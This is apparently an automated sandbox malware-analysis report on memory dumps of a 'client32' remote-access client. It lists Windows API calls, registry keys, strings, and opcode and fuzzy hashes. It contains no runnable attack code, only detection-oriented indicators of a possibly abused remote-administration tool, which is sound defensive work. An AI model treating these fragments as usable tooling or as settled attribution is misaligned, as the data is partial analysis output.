                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                                                                                    • API String ID: 3050498177-823534439
                                                                                                                                                                                                    • Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                                                                                    • Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11112B55
                                                                                                                                                                                                    • CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
                                                                                                                                                                                                    • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000000), ref: 11112C61
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                                                                                    • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                                                                                    • API String ID: 4195908086-2348320231
                                                                                                                                                                                                    • Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                                                                                    • Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76596610,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 11141906
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpenQueryValueVersion
                                                                                                                                                                                                    • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                                                                                    • API String ID: 2996790148-2117887902
                                                                                                                                                                                                    • Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                                                                                    • Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1110D0F6
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003BC), ref: 1110D109
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003BC), ref: 1110D118
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Initialize$CreateCurrentEnterEventLeaveThreadwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                                                                                    • API String ID: 3342958434-1024648535
                                                                                                                                                                                                    • Opcode ID: 9bf6e749eb4aa396e4371d48aecc328a042bee4d9b99b0343c33cbf1c1c517ad
                                                                                                                                                                                                    • Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bf6e749eb4aa396e4371d48aecc328a042bee4d9b99b0343c33cbf1c1c517ad
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                                                                                                    • API String ID: 3472027048-3774545468
                                                                                                                                                                                                    • Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                                                                                    • Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 886e61ee1db4a73107c1d7a95bd82af5a672a5ba6fc9625f73b8cf63a801b066
                                                                                                                                                                                                    • Instruction ID: 63e1efd3676a9638e3e81043c3dc0052e760c462e139dfc9f2a387f827b805c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 886e61ee1db4a73107c1d7a95bd82af5a672a5ba6fc9625f73b8cf63a801b066
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA12F478A043969FDB12CF64C9807AEFFF0AF07318F144A99E5618B391D7B1A950CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 111419A0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                                                                                      • Part of subcall function 111419A0: RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion
                                                                                                                                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                                                    • API String ID: 925726728-545709139
                                                                                                                                                                                                    • Opcode ID: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                                                                                    • Instruction ID: b52f9434772b6d6e8d8038633bf4c77d33c7f8479cfcef56ad60021fb0ce4fde
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4403c578d20b82e01fbdbd50243d795ec373803681fb6755249e61f6e885c6b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31E331F006268BD7119FB5C984BAEF7B0EB05718FA04575E928C3680E7346985CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                                                                                    • API String ID: 3494822531-1878648853
                                                                                                                                                                                                    • Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                                                                                    • Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110152AA
                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015328
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101522B
                                                                                                                                                                                                    • NSLSP, xrefs: 11015338
                                                                                                                                                                                                    • PackedCatalogItem, xrefs: 11015312
                                                                                                                                                                                                    • %012d, xrefs: 110152A4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
